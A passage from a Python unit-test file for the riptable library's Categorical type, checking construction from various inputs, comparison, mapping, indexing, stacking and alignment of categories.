assert c_bytes.dtype == np.int8, f"Dtype {c_bytes.dtype} was not correct for construction from small list."
assert len(c_bytes) == 5, f"Length of underlying index array was incorrect for construction from bytes."
unique_bytes = np.unique(list_bytes)
assert np.all(
c_bytes._categories_wrap._list == unique_bytes
), f"Categories did not generate a unique list of categories from input bytes list."
c_unicode = Categorical(np.array(list_unicode))
assert c_unicode.dtype == np.int8, f"Dtype {c_unicode.dtype} was not correct for construction from small list."
assert len(c_unicode) == 5, f"Length of underlying index array was incorrect for construction from unicode."
assert (
len(c_unicode._categories_wrap._list) == 4
), f"Length of unique categories was incorrect for construction from unicode."
assert (
c_unicode._categories_wrap._list[0] == b'a'
), f"Unique categories were not sorted for construction from unicode."
assert c_unicode._categories_wrap._list.dtype.char == 'S', f"Unicode strings were not flipped to byte strings."
c_true_unicode = Categorical(np.array(list_true_unicode))
assert (
c_true_unicode.dtype == np.int8
), f"Dtype {c_true_unicode.dtype} was not correct for construction from small list."
assert (
len(c_true_unicode) == 5
), f"Length of underlying index array was incorrect for construction from true unicode."
assert (
len(c_true_unicode._categories_wrap._list) == 4
), f"Length of unique categories was incorrect for construction from true unicode."
assert (
c_true_unicode._categories_wrap._list[0] == u'a\u2082'
), f"Unique categories were not sorted for construction from true unicode."
assert (
c_true_unicode._categories_wrap._list.dtype.char == 'U'
), f"Unicode strings were not flipped to byte strings."
def test_ctor_values_and_cats(self):
v_bytes = [b'IBM', b'AAPL', b'AMZN', b'IBM', b'hello']
v_str = ['IBM', 'AAPL', 'AMZN', 'IBM', 'hello']
v_true = [
u'IBM\u2082',
u'AAPL\u2082',
u'AMZN\u2082',
u'IBM\u2082',
u'hello\u2082',
]
c_bytes = [b'AAPL', b'AMZN', b'IBM']
c_str = ['AAPL', 'AMZN', 'IBM']
c_true = [u'AAPL\u2082', u'AMZN\u2082', u'IBM\u2082']
v_correct = [2, 0, 1, 2, 3]
c_correct = [b'AAPL', b'AMZN', b'IBM', b'inv']
valid_v = [
v_bytes,
v_str,
np.array(v_bytes),
np.array(v_str),
FastArray(v_bytes),
FastArray(v_str),
]
valid_c = [
c_bytes,
c_str,
np.array(c_bytes),
np.array(c_str),
FastArray(c_bytes),
FastArray(c_str),
]
for v in valid_v:
vdt = None
if hasattr(v, 'dtype'):
vdt = v.dtype
else:
vdt = type(v)
for c in valid_c:
cdt = None
if hasattr(c, 'dtype'):
cdt = c.dtype
else:
cdt = type(c)
# error if no invalid provided
with pytest.raises(ValueError):
cat = Categorical(v, c)
# accept invalid and correctly assign
# cat = Categorical(v, c, invalid_category=b'inv')
# self.assertEqual(cat._categories.dtype.char, 'S', msg=f"Categorical from v: {vdt} and c: {cdt} did not flip categories to bytestring")
# v_is_correct = bool(np.all(v_correct == cat.view(FastArray)))
# self.assertTrue(v_is_correct, msg=f"Did not create the correct underlying index array from v: {vdt} and c: {cdt}")
# c_is_correct = bool(np.all(c_correct == cat._categories))
# self.assertTrue(c_is_correct, msg=f"Did not create the correct categories from v: {vdt} and c: {cdt}")
# v = v_true
# vdt = "TRUE unicode"
# for c in valid_c:
# if hasattr(c,'dtype'):
# cdt = c.dtype
# else:
# cdt = type(c)
# cat = Categorical(v,c)
# ---------------------------------------------------------------------------
def test_ctor_bad_index(self):
idx_list = [1, 2, 3, 4, 5]
str_list = ['a', 'b']
with pytest.raises(ValueError):
c = Categorical(idx_list, str_list)
# ---------------------------------------------------------------------------
def test_ctor_non_unique(self):
'''
riptable categoricals, like pandas categoricals, do not allow a non-unique list of categories when an index array is provided.
'''
idx_list = [0, 1]
str_list = ['b', 'b', 'a']
c = Categorical(idx_list, str_list)
# ---------------------------------------------------------------------------
def test_ctor_enum(self):
codes = [1, 44, 44, 133, 75]
c = Categorical(codes, LikertDecision)
# ---------------------------------------------------------------------------
def test_compare_enum_int(self):
compare_func_names = [
'__ne__',
'__eq__',
'__ge__',
'__gt__',
'__le__',
'__lt__',
]
codes = [1, 44, 44, 133, 75]
valid_idx = 44
bad_idx = 43
valid_idx_correct = [
FastArray([True, False, False, True, True]),
FastArray([False, True, True, False, False]),
FastArray([False, True, True, True, True]),
FastArray([False, False, False, True, True]),
FastArray([True, True, True, False, False]),
FastArray([True, False, False, False, False]),
]
bad_idx_correct = [
FastArray([True, True, True, True, True]),
FastArray([False, False, False, False, False]),
FastArray([False, True, True, True, True]),
FastArray([False, True, True, True, True]),
FastArray([True, False, False, False, False]),
FastArray([True, False, False, False, False]),
]
for d in (LikertDecision, decision_dict):
c = Categorical(codes, d)
# test valid integer code
for name, correct in zip(compare_func_names, valid_idx_correct):
func = c.__getattribute__(name)
result = func(valid_idx)
was_correct = bool(np.all(correct == result))
assert (
was_correct
), f"Categorical enum comparison failed with good integer index on {name} operation. {c.view(FastArray)} code: {valid_idx}"
# test invalid integer code
for name, correct in zip(compare_func_names, bad_idx_correct):
func = c.__getattribute__(name)
result = func(bad_idx)
was_correct = bool(np.all(correct == result))
assert was_correct, f"Categorical enum comparison failed with good integer index on {name} operation"
# ---------------------------------------------------------------------------
def test_compare_enum_str(self):
compare_func_names = [
'__ne__',
'__eq__',
'__ge__',
'__gt__',
'__le__',
'__lt__',
]
codes = [1, 44, 44, 133, 75]
valid_idx = 'StronglyAgree'
bad_idx = 'x'
valid_idx_correct = [
FastArray([True, False, False, True, True]),
FastArray([False, True, True, False, False]),
FastArray([False, True, True, True, True]),
FastArray([False, False, False, True, True]),
FastArray([True, True, True, False, False]),
FastArray([True, False, False, False, False]),
]
for d in (LikertDecision, decision_dict):
c = Categorical(codes, d)
# test valid category string
for name, correct in zip(compare_func_names, valid_idx_correct):
func = c.__getattribute__(name)
result = func(valid_idx)
was_correct = bool(np.all(correct == result))
assert was_correct, f"Categorical enum comparison failed with good category string on {name} operation"
# test invalid category string
for name in compare_func_names:
func = c.__getattribute__(name)
with pytest.raises(ValueError):
result = func(bad_idx)
def test_map(self):
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False)
mapping = {'a': 'AA', 'b': 'BB', 'c': 'CC', 'd': 'DD'}
result = c.map(mapping)
correct = FastArray([b'BB', b'BB', b'CC', b'AA', b'DD'])
assert bool(np.all(result == correct))
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False, base_index=0)
result = c.map(mapping)
assert bool(np.all(result == correct))
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False)
mapping = {'a': 'AA', 'b': 'BB', 'c': 'CC'}
result = c.map(mapping, invalid='INVALID')
correct = FastArray([b'BB', b'BB', b'CC', b'AA', b'INVALID'])
assert bool(np.all(result == correct))
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False, base_index=0)
result = c.map(mapping, invalid='INVALID')
assert bool(np.all(result == correct))
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False)
mapping = {'a': 1.0, 'b': 2.0, 'c': 3.0}
result = c.map(mapping, invalid=666)
correct = FastArray([2.0, 2.0, 3.0, 1.0, 666.0])
assert bool(np.all(result == correct))
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False, base_index=0)
result = c.map(mapping, invalid=666)
assert bool(np.all(result == correct))
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False)
result = c.map(mapping)
assert np.isnan(result[4])
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False, base_index=0)
result = c.map(mapping)
assert np.isnan(result[4])
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False)
mapping = FastArray(['w', 'x', 'y', 'z'])
result = c.map(mapping)
correct = FastArray([b'w', b'w', b'x', b'y', b'z'])
assert bool(np.all(result == correct))
c = Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False, base_index=0)
result = c.map(mapping)
assert bool(np.all(result == correct))
c = Categorical([2, 2, 3, 1, 4, 0], ['a', 'b', 'c', 'd'])
mapping = {'a': 1.0, 'b': 2.0, 'c': 3.0}
result = c.map(mapping, invalid=666)
correct = FastArray([2.0, 2.0, 3.0, 1.0, 666.0, 666.0])
assert bool(np.all(result == correct))
# ---------------------------------------------------------------------------
def test_from_category(self):
c = Categorical(['a', 'a', 'b', 'c', 'a'])
bin = c.from_category('a')
assert bin == 1
c = Categorical(['a', 'a', 'b', 'c', 'a'], base_index=0)
bin = c.from_category(b'a')
assert bin == 0
with pytest.raises(ValueError):
bin = c.from_category('z')
c = Categorical(np.arange(5, 10))
bin = c.from_category(5)
assert bin == 1
with pytest.raises(ValueError):
bin = c.from_category(100)
c = Categorical([FastArray(['a', 'b', 'c']), np.arange(3)])
bin = c.from_category(('c', 2))
assert bin == 3
# ---------------------------------------------------------------------------
def test_getitem_enum_int(self):
codes = [1, 44, 44, 133, 75]
correct_strings = [
'StronglyDisagree',
'StronglyAgree',
'StronglyAgree',
'Agree',
'Disagree',
]
c = Categorical(codes, LikertDecision)
# getitem good init
for idx in range(5):
assert correct_strings[idx] == c[idx], f"Failed to return correct string for valid index in categorical."
# getitem bad init
with pytest.raises(IndexError):
result = c[5]
# ---------------------------------------------------------------------------
def test_getitem_enum_int_list(self):
codes = [1, 44, 44, 133, 75]
correct_strings = [
'StronglyDisagree',
'StronglyAgree',
'StronglyAgree',
'Agree',
'Disagree',
]
c = Categorical(codes, LikertDecision)
result = c[[1, 4]]
assert isinstance(
result, Categorical
), f"Failed to return Categorical when indexing by integer list. Returned {type(result)} instead."
assert result[0] == 'StronglyAgree'
assert result[1] == 'Disagree'
result = c[np.array([1, 4])]
assert isinstance(
result, Categorical
), f"Failed to return Categorical when indexing by integer list. Returned {type(result)} instead."
assert result[0] == 'StronglyAgree'
assert result[1] == 'Disagree'
result = c[FastArray([1, 4])]
assert isinstance(
result, Categorical
), f"Failed to return Categorical when indexing by integer list. Returned {type(result)} instead."
assert result[0] == 'StronglyAgree'
assert result[1] == 'Disagree'
def test_getitem_enum(self):
self._notimpl()
def test_setitem_enum(self):
self._notimpl()
# -------------------------------------------- MATLAB ----------------------------------
def test_ctor_matlab(self):
idx_list = [1.0, 2.0, 3.0, 4.0, 5.0]
str_list = ['a', 'b', 'c', 'd', 'e']
with pytest.raises(TypeError):
c = Categorical(idx_list, str_list)
c = Categorical(idx_list, str_list, from_matlab=True)
assert c[0] == 'a'
assert c.dtype == np.dtype(np.int8)
# def test_ctor_matlab_non_unique(self):
# idx_list = [1.0, 2.0, 3.0, 4.0, 5.0]
# str_list = ['a','b','c','d','d']
# with self.assertRaises(ValueError, msg=f"Failed to raise error when MATLab categories were not unique."):
# c = Categorical(idx_list, str_list, from_matlab=True)
# ------------------------------- PANDAS CATEGORICAL ----------------------------------
def test_ctor_pandas_cat(self):
idx_list = [0, 1, 2, 3, 4]
str_list = ['a', 'b', 'c', 'd', 'e']
pd_c = pd.Categorical.from_codes(idx_list, str_list)
pd_c = Categorical(pd_c)
rt_c = Categorical(idx_list, str_list)
cats_match = bool(np.all(pd_c.category_array == rt_c.category_array))
assert cats_match, f"Failed to create matching categories from pandas categorical"
# idx_match = bool(np.all(pd_c.view(np.ndarray)+1 == rt_c.view(np.ndarray)))
# self.assertTrue(idx_match, msg=f"Failed to create matching unerlying array from pandas categorical")
# convert pandas invalid bytes
pd_c = pd.Categorical.from_codes([-1, 0, 1, 2], ['a', 'b', 'c'])
pd_c = Categorical(pd_c)
cat_list = pd_c.category_array
assert len(cat_list) == 3
no_negative = bool(np.all(pd_c.view(FastArray) >= 0))
assert no_negative
# convert pandas invalid unicode
pd_c = pd.Categorical.from_codes([-1, 0, 1, 2], [u'\u2082', u'\u2083', u'\u2084'])
pd_c = Categorical(pd_c)
cat_list = pd_c.category_array
assert len(cat_list) == 3
no_negative = bool(np.all(pd_c.view(FastArray) >= 0))
assert no_negative
# --------------------------------RIPTABLE CATEGORICAL ----------------------------------------
# def test_ctor_rt_cat(self):
# c_unicode = Categorical(list_unicode)
# c = c_unicode.copy(forceunicode=True)
# self.assertEqual(c._categories_wrap._list.dtype.char, 'U', msg=f"Failed to force unicode on categorical copy.")
# ------------------------------------CUSTOM CATEGORIES ----------------------------------
def test_ctor_list_unique(self):
unique_str = ['a', 'b', 'c', 'd', 'e', 'f']
str_list = ['a', 'b', 'c', 'd', 'e']
c = Categorical(str_list, unique_str)
cats_match = bool(np.all(c._categories_wrap._list == unique_str))
assert cats_match, f"Failed to create matching categories from unique category input."
# ------------------------------------INTEGER ARRAY ----------------------------------
def test_ctor_integer_array(self):
lis = [1, 4, 9, 16, 25]
c = Categorical(lis)
for v1, v2 in zip(c, lis):
assert v1 == v2
# ------------------------------------GARBAGE ----------------------------------
def test_ctor_garbage(self):
with pytest.raises(TypeError):
c = Categorical(1, 2)
# ------------------------------------TEST FORCE DTYPE ----------------------------------
def test_init_with_dtype(self):
int_types = [np.int8, np.int16, np.int32, np.int64]
float_types = [np.float32, np.float64]
uint_types = [np.uint8, np.uint16, np.uint32, np.uint64]
arr = ['a', 'b', 'c', 'd', 'e']
for dt in int_types:
c = Categorical(arr, dtype=dt)
assert c.dtype == dt, f"Failed to force the correct dtype {dt} for categorical."
for dt in float_types + uint_types:
with pytest.raises(TypeError):
c = Categorical(arr, dtype=dt)
# ------------------------------------TEST CONVERT VALUE-------------------------------------
def test_possibly_convert_value(self):
'''
TODO: fix for new Categories class
'''
self._notimpl()
def test_categories_bad_init(self):
tup = ('a', 'b', 'c')
with pytest.raises(TypeError):
cat = Categories(tup)
def test_categories_len(self):
cats_from_list = Categorical(['a', 'b', 'c'], ordered=True, base_index=1, filter=None)._categories_wrap
assert len(cats_from_list) == 3
cats_from_enum = Categorical(FastArray([144]), LikertDecision)._categories_wrap
assert len(cats_from_enum) == 144
def test_get_categories(self):
c_list = [
'StronglyAgree',
'Agree',
'Disagree',
'StronglyDisagree',
'NeitherAgreeNorDisagree',
]
cats_from_list = Categories(c_list, unicode=True)
cats_from_enum = Categories(LikertDecision)
get_cats_match = bool(np.all(cats_from_list.get_categories() == cats_from_enum.get_categories()))
assert get_cats_match
def test_possibly_add_categories(self):
self._notimpl()
# uniquify and sort
# raise exception for adding cats to intenum, etc.
def test_categories_preserves_subtype(self):
# Test the Categorical.categories() method preserves the array type for the category data.
# This is important because we want the array(s) returned by this method to have the same type
# as the internal data (i.e. what's returned by Categorical.category_array or Categorical.category_dict).
# Single-key Categorical
dates = rt.Date(
[
'2019-03-15',
'2019-04-18',
'2019-05-17',
'2019-06-21',
'2019-07-19',
'2019-08-16',
'2019-09-20',
'2019-10-18',
'2019-11-15',
'2019-12-20',
]
)
dates.name = 'dates'
dates_cat = rt.Cat(dates)
cats = dates_cat.categories()
assert type(dates) == type(cats)
# Multi-key Categorical
datestrs = rt.FA(
[
'2019-03-15',
'2019-04-18',
'2019-05-17',
'2019-06-21',
'2019-07-19',
'2019-08-16',
'2019-09-20',
'2019-10-18',
'2019-11-15',
'2019-12-20',
]
)
datestrs.name = 'datestrs'
mcat = rt.Cat([dates, datestrs])
mcats = mcat.categories()
assert type(mcats['key_0']) == type(dates)
assert type(mcats['key_1']) == type(datestrs)
# Empty single-key Categorical
dates = rt.Date([])
dates_cat = rt.Cat(dates)
cats = dates_cat.categories()
assert type(dates) == type(cats)
def test_make_unique(self):
# SJK: changed this test on 8/21/2018 - count now comes from the grouping object, not Categories.make unique
values = FastArray(['a', 'b', 'c', 'c', 'd', 'a', 'b'])
# c = Categories([],base_index=1)
# index, cat_len, filter = c.make_unique(values)
cat = Categorical(values, ordered=True, base_index=1, filter=None)
index = cat._fa
c = cat._categories_wrap
assert len(index) == 7
assert max(index) == 4
assert c._mode == CategoryMode.StringArray
assert c._list.dtype.char == 'S'
assert c.isbytes
univals = values.astype('U')
cat = Categorical(univals, ordered=True, base_index=1, filter=None, unicode=True)
index = cat._fa
c = cat._categories_wrap
assert len(index) == 7
assert max(index) == 4
assert c._mode == CategoryMode.StringArray
assert c._list.dtype.char == 'U'
assert c.isunicode
@pytest.mark.xfail(
reason='20200416 This test was previously overridden by a later test in the file with the same name. Need to revisit and get back in a working state.'
)
def test_force_base_index(self):
filter = FastArray([True, True, False, False, True])
c = Categorical(['a', 'a', 'b', 'c', 'a'])
assert c.base_index == 1, 'Did not default base index to 1'
assert c._fa[0] == 1, 'Did not default base index to 1'
c = Categorical(['a', 'a', 'b', 'c', 'a'], base_index=0)
assert c.base_index == 0, 'Did not force base index to 0'
assert c._fa[0] == 0, 'Did not force base index to 0'
c = Categorical(['a', 'a', 'b', 'c', 'a'], filter=filter)
assert len(c.category_array) == 1
assert c._fa[2] == 0, 'Did not default base index to 1'
c = Categorical(['a', 'a', 'b', 'c', 'a'], base_index=0, filter=filter)
assert len(c.category_array) == 1
assert c._fa[2] == INVALID_DICT[c.dtype.num], 'Did not force base index to 0'
with pytest.raises(ValueError):
c = Categorical(['a', 'a', 'b', 'c', 'a'], base_index=99, filter=filter)
c = Categorical(['a', 'a', 'b', 'c', 'a'], ['a', 'b', 'c'])
assert c.base_index == 1, 'Did not default base index to 1'
assert c._fa[0] == 1, 'Did not default base index to 1'
c = Categorical(['a', 'a', 'b', 'c', 'a'], ['a', 'b', 'c'], base_index=0)
assert c.base_index == 0, 'Did not force base index to 0'
assert c._fa[0] == 0, 'Did not force base index to 0'
with pytest.raises(NotImplementedError):
c = Categorical(['a', 'a', 'b', 'c', 'a'], ['a', 'b', 'c'], base_index=0, filter=filter)
with pytest.raises(ValueError):
c = Categorical([1.0, 2.0, 3.0], ['a', 'b', 'c'], from_matlab=True, base_index=0)
pdc = pd.Categorical(['a', 'a', 'b', 'c', 'a'])
with pytest.raises(ValueError):
c = Categorical(pdc, base_index=0)
def test_is_in_unique_strings(self):
values = ['a', 'b', 'c', 'c', 'd', 'a', 'b']
good_cats = ['a', 'b', 'c', 'd']
incomplete_cats = ['a', 'b', 'c']
bad_cats = ['a', 'a', 'b']
invalid = 'invalid'
###--------REMOVED from_provided_categories, rewrite these tests to go through main constructor
# valid bytes
c = Categorical(values, good_cats, ordered=True, base_index=1, unicode=False, filter=None)
cats = c._categories_wrap
assert len(c) == 7
assert max(c._fa) == 4
assert cats._mode == CategoryMode.StringArray
assert cats._list.dtype.char == 'S'
assert cats.isbytes
# valid unicode
c = Categorical(values, good_cats, ordered=True, base_index=1, unicode=True, filter=None)
cats = c._categories_wrap
assert len(c) == 7
assert max(c._fa) == 4
assert cats._mode == CategoryMode.StringArray
assert cats._list.dtype.char == 'U'
assert cats.isunicode
# non-unique categories
# 4/12/2019 - no longer checks for uniqueness
# with self.assertRaises(ValueError):
# c = Categories.from_provided_categories(values, bad_cats, ordered=True, base_index=1, unicode=False, filter=None)
# not all values found in categories
with pytest.raises(ValueError):
c = Categorical(values, incomplete_cats, ordered=True, base_index=1, unicode=False, filter=None,)
# insert invalid True
# 5/16/2019 invalid must appear in provided uniques
with pytest.raises(ValueError):
c = Categorical(
values, incomplete_cats, ordered=True, base_index=1, unicode=True, filter=None, invalid=invalid,
)
cats = c._categories_wrap
assert len(c) == 7
assert max(c._fa) == 3
assert cats._mode == CategoryMode.StringArray
assert cats._list.dtype.char == 'U'
assert cats.isunicode
def test_getitem_enum_str(self):
codes = [1, 44, 44, 133, 75]
correct = [True, False, False, False, False]
valid_str = 'StronglyDisagree'
invalid_str = 'q'
c = Categorical(codes, LikertDecision)
# with self.assertRaises(IndexError):
mask = c[valid_str]
is_correct = bool(np.all(mask == correct))
assert is_correct
with pytest.raises(ValueError):
mask = c[invalid_str]
assert sum(mask) == 0
def test_match_str_to_category(self):
single_byte = b'a'
single_unicode = 'a'
single_true_unicode = u'\u2082'
byte_values = [b'a', b'b', b'c', b'c', b'd', b'a', b'b']
values = FastArray(['a', 'b', 'c', 'c', 'd', 'a', 'b'])
true_unicode = [u'\u2082', u'\u2083', u'\u2082']
# 4/25/2019 - changed these tests to construct a Categorical, rather than
# a Categories object directly. Categorical will always make a Categories object.
# (held in _categories_wrap)
c = Categorical(values, ordered=True, base_index=1, filter=None)
matching_char = c._categories_wrap.match_str_to_category(single_unicode)
assert isinstance(matching_char, bytes)
with pytest.raises(TypeError):
matching = c._categories_wrap.match_str_to_category(single_true_unicode)
univals = np.array(['a', 'b', 'c', 'c', 'd', 'a', 'b'])
c = Categorical(univals, ordered=True, base_index=1, filter=None, unicode=True)
matching_char = c._categories_wrap.match_str_to_category(single_byte)
assert isinstance(matching_char, str)
c = Categorical(values, ordered=True, base_index=1, filter=None)
matching = c._categories_wrap.match_str_to_category(values)
assert matching.dtype.char == 'S'
with pytest.raises(TypeError):
matching = c._categories_wrap.match_str_to_category(true_unicode)
c = Categorical(univals, ordered=True, base_index=1, filter=None, unicode=True)
matching = c._categories_wrap.match_str_to_category(values)
assert matching.dtype.char == 'U'
# Categories object being removed
# Disabling these tests - methods will move into Categorical
# 4/24/2019
# def test_get_category_index(self):
# values = FastArray(['a', 'b', 'c', 'c', 'd', 'a', 'b', 'g'])
# _, c, _, _ = Categories.from_array(values, ordered=True, base_index=1, filter=None)
# # when found, will return exact index
# str_idx = c.get_category_index('b')
# self.assertEqual(str_idx, 2)
# # when ordered, will return floating point for LTE GTE
# str_idx = c.get_category_index('e')
# self.assertEqual(str_idx, 4.5)
# # when unordered, will return invalid index (length of string array)
# c._sorted = False
# str_idx = c.get_category_index('e')
# self.assertEqual(str_idx, 6)
# def test_get_category_match_index(self):
# values = FastArray(['a', 'b', 'c', 'c', 'd', 'a', 'b', 'g'])
# _, c, _, _ = Categories.from_array(values, ordered=False, base_index=1, filter=None)
# string_matches = c.get_category_match_index(['a','b'])
# self.assertEqual(string_matches, [1,2])
# c._mode = CategoryMode.IntEnum
# with self.assertRaises(NotImplementedError):
# string_matches = c.get_category_match_index(['a','b'])
def test_possibly_invalid(self):
values = ['a', 'b', 'c', 'c', 'd', 'a', 'b', 'g']
c = Categorical(values, base_index=1)
out_of_range = -50
sentinel = INVALID_DICT[c.dtype.num]
c.view(FastArray)[0] = out_of_range
# c.view(FastArray)[1] = sentinel
# **changed invalid, all will display as bad code if changed underneath and not in range
assert c[0] == "!<-50>"
# self.assertEqual(c[1], "!<inv>")
def test_categories_getitem_str_list(self):
codes = [1, 44, 44, 133, 75]
correct = FastArray([False, True, True, False, True])
c = Categorical(codes, LikertDecision)
mask = c[['StronglyAgree', 'Disagree']]
is_correct = bool(np.all(mask == correct))
assert is_correct
mask = c[[b'StronglyAgree', b'Disagree']]
is_correct = bool(np.all(mask == correct))
assert is_correct
def test_categories_print_repr(self):
self._notimpl()
def test_enum_dict_warning(self):
class DupeEnum(IntEnum):
code_a = 1
code_b = 1
code_c = 1
code_d = 2
with pytest.warns(UserWarning):
c = Categorical([1, 2], DupeEnum)
# ------------------------- TEST MERGE -------------------------------------------
# def test_merge(self):
# from riptable.rt_categorical import categorical_merge
# c_bytes = Categorical(['b','b','b','a','b','b'], ['a','b'])
# c_unicode = Categorical(["AAPL\u2080","AMZN\u2082"])
# result = categorical_merge([c_bytes, c_unicode])
# # self.assertTrue(result[0]._categories_wrap._list is result[1]._categories_wrap._list, msg=f"Categorical merge did not assign the same dictionary to both arrays.")
# self.assertEqual(result[0]._categories_wrap._list.dtype.char, 'U', msg=f"{result[0]._categories_wrap._list.dtype.char} was not 'U'. dictionary was not flipped to unicode.")
# for item in c_bytes._categories_wrap._list:
# self.assertTrue(item.decode() in result[0]._categories_wrap._list, msg=f"{item} did not appear in final categories")
# for item in c_unicode._categories_wrap._list:
# self.assertTrue(item in result[0]._categories_wrap._list, msg=f"{item} did not appear in final categories")
# c1 = Categorical([1, 1, 3, 2, 2], [1, 2, 3, 4, 5], from_matlab=True)
# c2 = Categorical([2, 2, 4, 4, 3], [1, 2, 3, 4, 5], from_matlab=True)
# [cm1, cm2] = categorical_merge([c1, c2])
# self.assertTrue((cm1 == [1, 1, 3, 2, 2]).all())
# self.assertTrue((cm2 == [2, 2, 4, 4, 3]).all())
# ------------------------- TEST HSTACK -------------------------------------------
def test_hstack(self):
c1 = Categorical(['a', 'a', 'c', 'b', 'b'])
c2 = Categorical(['b', 'b', 'd', 'd', 'c'])
cm = Categorical.hstack([c1, c2])
assert (cm.as_string_array == ['a', 'a', 'c', 'b', 'b', 'b', 'b', 'd', 'd', 'c']).all()
c1 = Categorical([1, 1, 3, 2, 2], [1, 2, 3, 4, 5], from_matlab=True)
c2 = Categorical([2, 2, 4, 4, 3], [1, 2, 3, 4, 5], from_matlab=True)
cm = Categorical.hstack([c1, c2])
assert (cm == [1, 1, 3, 2, 2, 2, 2, 4, 4, 3]).all()
def test_hstack_fails_for_different_mode_cats(self):
# Create a dictionary-mode Categorical (from ISO3166 data).
# The dictionary is created manually below instead of using e.g.
# {k: int(v) for (k, v) in ISOCountryCode.__members__.items()}
# so the dictionary we give to Categorical does not have the insert ordering
# imply an ordering of the keys/values.
country_code_dict = {
'IRL': 372, 'USA': 840, 'AUS': 36, 'HKG': 344, 'JPN': 392,
'MEX': 484, 'KHM': 116, 'THA': 764, 'JAM': 388, 'ARM': 51
}
# The values for the Categorical's backing array.
# This includes some value(s) not in the dictionary and not all values in the dictionary are used here.
country_num_codes = [36, 36, 344, 840, 840, 372, 840, 372, 840, 124, 840, 124, 36, 484]
cat1 = rt.Categorical(country_num_codes, country_code_dict)
assert cat1.category_mode == CategoryMode.Dictionary
# Create a single-key, string-mode Categorical.
cat2 = rt.Categorical(['AUS', 'AUS', 'HKG', 'USA', 'USA', 'IRL', 'USA', 'IRL', 'USA', 'KHM', 'IRL', 'AUS', 'MEX'])
assert cat2.category_mode != CategoryMode.Dictionary
# Try to hstack the two Categoricals. This should fail due to the CategoryMode values being different.
with pytest.raises((ValueError, TypeError)):
rt.hstack([cat1, cat2])
def test_align(self):
c1 = Categorical(['a', 'b', 'c'])
c2 = Categorical(['d', 'e', 'f'])
c3 = Categorical(['c', 'f', 'z'])
cm = Categorical.align([c1, c2, c3])
assert (cm[0].as_string_array == ['a', 'b', 'c']).all()
assert (cm[1].as_string_array == ['d', 'e', 'f']).all()
assert (cm[2].as_string_array == ['c', 'f', 'z']).all()
assert (cm[0].categories() == FastArray([b'Filtered', b'a', b'b', b'c', b'd', b'e', b'f', b'z'])).all()
assert (cm[0].categories() == cm[1].categories()).all()
assert (cm[0].categories() == cm[2].categories()).all()
c1 = Categorical([1, 1, 3, 2, 2], [1, 2, 3, 4, 5], from_matlab=True)
c2 = Categorical([2, 2, 4, 4, 3], [1, 2, 3, 4, 5], from_matlab=True)
cm = Categorical.align([c1, c2])
assert (cm[0] == [1, 1, 3, 2, 2]).all()
assert (cm[1] == [2, 2, 4, 4, 3]).all()
# Multikey with nested Categorical
c1 = Categorical([Categorical(['a']), FastArray([1])])
c2 = Categorical([Categorical(['b']), FastArray([2])])
cm = Categorical.align([c1, c2])
assert cm[0][0] == ('a', 1)
assert cm[1][0] == ('b', 2)
assert cm[0].category_dict == cm[1].category_dict
def test_categorical_merge_dict(self):
from riptable.rt_categorical import categorical_merge_dict
d1 = {'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5}
d2 = {'a': 1, 'e': 5, 'b': 2, 'f': 6}
c1 = Categorical([3, 3, 4, 3, 1, 2, 5], d1)
c2 = Categorical([1, 1, 5, 2, 2, 1, 5], d2)
combined = categorical_merge_dict([c1, c2], return_type=dict)
for i in range(1, 6):
assert i in combined.values()
def test_getitem_empty(self):
c = Categorical([0, 1, 2], ['a', 'b', 'c'])
empty_list = c[[]]
assert isinstance(empty_list, Categorical)
dict_matches = bool(np.all(empty_list.categories() == c.categories()))
assert dict_matches
with pytest.raises(IndexError):
empty_np = c[np.array([])]
assert isinstance(empty_np, Categorical)
dict_matches = bool(np.all(empty_np.categories() == c.categories()))
assert dict_matches
def test_iter_groups(self):
correct_keys = FastArray(['a', 'b', 'c', 'd', 'e'])
correct_idx = [[8], [3], [5, 6], [2, 9], [0, 1, 4, 7]]
str_arr = FastArray(['e', 'e', 'd', 'b', 'e', 'c', 'c', 'e', 'a', 'd'])
c = Categorical(str_arr)
for i, tup in enumerate(c.iter_groups()):
assert tup[0] == correct_keys[i]
assert bool(np.all(tup[1] == correct_idx[i]))
def test_enum_dict_multi(self):
self._notimpl()
# not implemented
def test_enum_init_errors(self):
with pytest.raises(TypeError):
c = Categorical(['a', 'b', 'c'], LikertDecision)
def test_custom_invalid_category(self):
# 5/16/2019 invalid must appear in provided uniques
c = Categorical(
['a', 'b', 'c', 'my_invalid'], ['a', 'b', 'c', 'my_invalid'], invalid='my_invalid', base_index=1,
)
assert c[3] == 'my_invalid'
assert c.isnan()[3]
assert len(c.category_array) == 4
@pytest.mark.xfail(reason="After invalid_set, the custom invalid value is not displayed.")
def test_invalid_set(self):
c = Categorical(
['a', 'b', 'c', 'my_invalid'], ['a', 'b', 'c', 'my_invalid'], invalid='my_invalid', base_index=1,
)
# set a new string to be displayed for invalid items and validate
custom_invalid = "custom_invalid"
c.invalid_set(custom_invalid)
assert c[3] == custom_invalid
assert c.isnan()[3]
assert len(c.category_array) == 4
def test_lock_unlock(self):
self._notimpl()
# halfway implemented
def test_set_item(self):
self._notimpl()
# when index needs to be fixed after categories are added
# setitem with integer / invalid integer
# setitem with string / invalid category
def test_return_empty_cat(self):
self._notimpl()
# this code still needs to get written
def test_getitem_np_str(self):
c = Categorical(['a', 'a', 'b', 'a', 'c', 'c', 'b'])
correct = FastArray([True, True, True, True, False, False, True])
with pytest.raises(IndexError):
result = c[np.array(['a', 'b'])]
# self.assertTrue(array_equal(result, correct), msg=f"incorrect getitem result when indexing by numpy array of strings")
with pytest.raises(IndexError):
result = c[np.array(['a', 'b']).astype('S')]
# self.assertTrue(array_equal(result, correct), msg=f"incorrect getitem result when indexing by numpy array of strings")
def test_getitem_slice(self):
c = Categorical(['a', 'a', 'b', 'a', 'c', 'c', 'b'])
result = c[:3]
assert isinstance(result, Categorical)
match_fa = bool(np.all(result.view(FastArray) == [1, 1, 2]))
